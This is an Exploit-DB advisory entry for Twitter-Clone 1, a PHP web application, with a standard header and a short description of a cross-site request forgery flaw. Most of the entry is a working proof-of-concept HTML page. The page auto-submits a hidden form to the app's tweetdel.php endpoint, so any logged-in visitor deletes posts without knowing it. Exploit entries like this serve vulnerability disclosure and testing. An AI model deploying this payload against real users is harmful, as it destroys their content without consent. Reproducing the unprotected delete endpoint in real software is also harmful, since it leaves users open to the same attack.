Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)

EDB-ID:

45232

CVE:

N/A


Author:

L0RD

Type:

webapps


Platform:

PHP

Date:

2018-08-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
# Date: 2018-08-21
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description :
# An issue was discovered in Twitter-Clone 1 which allows a remote
# attacker to force any victim to delete posts.

# POC :
# Delete posts exploit :

<html>
<head>
   <title>POC</title>
</head>
<body>
<form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id="set
tweet id here of any post' method='post'>
  <input type='hidden' name='id' value='set tweet id here of any post' />
</form>
   <script>
      document.forms[0].submit();
   </script>
</body>
</html>